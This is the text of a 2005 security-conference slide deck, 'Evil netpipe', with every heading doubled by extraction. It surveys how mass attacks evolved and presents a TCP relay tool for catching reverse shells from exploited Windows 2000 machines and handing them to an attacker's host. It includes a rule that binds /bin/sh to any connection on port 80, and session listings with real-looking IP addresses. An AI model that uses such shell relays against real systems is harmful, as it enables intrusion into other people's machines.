Evil netpipeEvil netpipe

timhsu @ chroot.org

July 2005

Table of contentsTable of contents

Evolution of attackEvolution of attack What is netpipeWhat is netpipe Netpipe featureNetpipe feature ExampleExample

Years agoYears ago

Hacked sites on bye oneHacked sites on bye one Banner-scan all IP range after Banner-scan all IP range after

exploit appearexploit appear Just used desktop PCJust used desktop PC

TodayToday

Auto toolsAuto tools Massroot exploitsMassroot exploits WormWorm

Target listTarget list Banner-scan before exploit appearBanner-scan before exploit appear Google hacking Google hacking

Walking hackWalking hack LaptopLaptop Thanks the wirelessThanks the wireless

Attack EvolutionAttack Evolution

Attack EvolutionAttack Evolution

CommandsCommands

lsls cpcp rmrm redirectredirect killkill killallkillall historyhistory pipepipe

FeatureFeature

Accept TCP connectionsAccept TCP connections TCP connection redirectTCP connection redirect Manage interfaceManage interface Rules Rules

Pipe rulesPipe rules

pipe act1:ip1:port1 to act2:ip2:port2 pipe act1:ip1:port1 to act2:ip2:port2 Action:Action:

autoauto Connect right nowConnect right now

waitwait Wait connectionWait connection

openopen Open connection Open connection

execexec Execute programExecute program

Pipe examplePipe example

AutoAuto pipe auto:140.111.1.10:80 to pipe auto:140.111.1.10:80 to

auto:59.62.141.132:21auto:59.62.141.132:21

WaitWait pipe wait:69.47.28.33:80 to pipe wait:69.47.28.33:80 to

open:201.38.48.216:22open:201.38.48.216:22

ExecExec pipe wait:any:80 to exec:/bin/sh:-ipipe wait:any:80 to exec:/bin/sh:-i

Exploit attacksExploit attacks

Netpipe acceptsNetpipe accepts

listlist#6 140.96.0.250:64660 "Microsoft Windows 2000 [Version 5.00.219"#6 140.96.0.250:64660 "Microsoft Windows 2000 [Version 5.00.219"#7 140.96.119.20:38985 "Microsoft Windows 2000 [Version 5.00.219"#7 140.96.119.20:38985 "Microsoft Windows 2000 [Version 5.00.219"#8 140.97.162.86:17665 ""#8 140.97.162.86:17665 ""#9 140.97.178.49:59802 "Microsoft Windows 2000 ["#9 140.97.178.49:59802 "Microsoft Windows 2000 ["#10 140.97.185.4:8705 "Microsoft Windows 2000 [Version 5.00.219"#10 140.97.185.4:8705 "Microsoft Windows 2000 [Version 5.00.219"#11 140.97.191.102:34860 "Microsoft Windows 2000 [Version 5.00.219"#11 140.97.191.102:34860 "Microsoft Windows 2000 [Version 5.00.219"#12 140.97.194.178:53781 "Microsoft Windows 2000 [Version 5.00.219"#12 140.97.194.178:53781 "Microsoft Windows 2000 [Version 5.00.219"#13 140.97.194.190:31074 "Microsoft Windows 2000 [Version 5.00.219"#13 140.97.194.190:31074 "Microsoft Windows 2000 [Version 5.00.219"#14 140.97.202.14:8209 "Microsoft Windows 2000 [Version 5.00.219"#14 140.97.202.14:8209 "Microsoft Windows 2000 [Version 5.00.219"#15 140.97.202.29:56571 "Microsoft Windows 2000 [Version 5.00.219"#15 140.97.202.29:56571 "Microsoft Windows 2000 [Version 5.00.219"#16 140.97.206.212:33401 "Microsoft Windows 2000 [Version 5.00.219"#16 140.97.206.212:33401 "Microsoft Windows 2000 [Version 5.00.219"#17 140.97.211.58:12054 "Microsoft Windows 2000 [Version 5.00.219"#17 140.97.211.58:12054 "Microsoft Windows 2000 [Version 5.00.219"#18 140.97.213.73:7108 "Microsoft Windows 2000 [Version 5.00.219"#18 140.97.213.73:7108 "Microsoft Windows 2000 [Version 5.00.219"#19 140.97.229.89:54011 "Microsoft Windows 2000 [Version 5.00.219"#19 140.97.229.89:54011 "Microsoft Windows 2000 [Version 5.00.219"#20 211.21.75.208:4823 ""#20 211.21.75.208:4823 ""

redirect 10 to 20

Hacker attachHacker attach

listlist#6 140.96.0.250:64660 "Microsoft Windows 2000 [Version 5.00.219"#6 140.96.0.250:64660 "Microsoft Windows 2000 [Version 5.00.219"#7 140.96.119.20:38985 "Microsoft Windows 2000 [Version 5.00.219"#7 140.96.119.20:38985 "Microsoft Windows 2000 [Version 5.00.219"#8 140.97.162.86:17665 ""#8 140.97.162.86:17665 ""#9 140.97.178.49:59802 "Microsoft Windows 2000 ["#9 140.97.178.49:59802 "Microsoft Windows 2000 ["#10 140.97.185.4:8705 <-> 211.21.75.208:4823#10 140.97.185.4:8705 <-> 211.21.75.208:4823#11 140.97.191.102:34860 "Microsoft Windows 2000 [Version 5.00.219"#11 140.97.191.102:34860 "Microsoft Windows 2000 [Version 5.00.219"#12 140.97.194.178:53781 "Microsoft Windows 2000 [Version 5.00.219"#12 140.97.194.178:53781 "Microsoft Windows 2000 [Version 5.00.219"#13 140.97.194.190:31074 "Microsoft Windows 2000 [Version 5.00.219"#13 140.97.194.190:31074 "Microsoft Windows 2000 [Version 5.00.219"#14 140.97.202.14:8209 "Microsoft Windows 2000 [Version 5.00.219"#14 140.97.202.14:8209 "Microsoft Windows 2000 [Version 5.00.219"#15 140.97.202.29:56571 "Microsoft Windows 2000 [Version 5.00.219"#15 140.97.202.29:56571 "Microsoft Windows 2000 [Version 5.00.219"#16 140.97.206.212:33401 "Microsoft Windows 2000 [Version 5.00.219"#16 140.97.206.212:33401 "Microsoft Windows 2000 [Version 5.00.219"#17 140.97.211.58:12054 "Microsoft Windows 2000 [Version 5.00.219"#17 140.97.211.58:12054 "Microsoft Windows 2000 [Version 5.00.219"#18 140.97.213.73:7108 "Microsoft Windows 2000 [Version 5.00.219"#18 140.97.213.73:7108 "Microsoft Windows 2000 [Version 5.00.219"#19 140.97.229.89:54011 "Microsoft Windows 2000 [Version 5.00.219"#19 140.97.229.89:54011 "Microsoft Windows 2000 [Version 5.00.219"#20 211.21.75.208:4823 <-> 140.97.185.4:8705 #20 211.21.75.208:4823 <-> 140.97.185.4:8705

Question ?

Thank You

~ END ~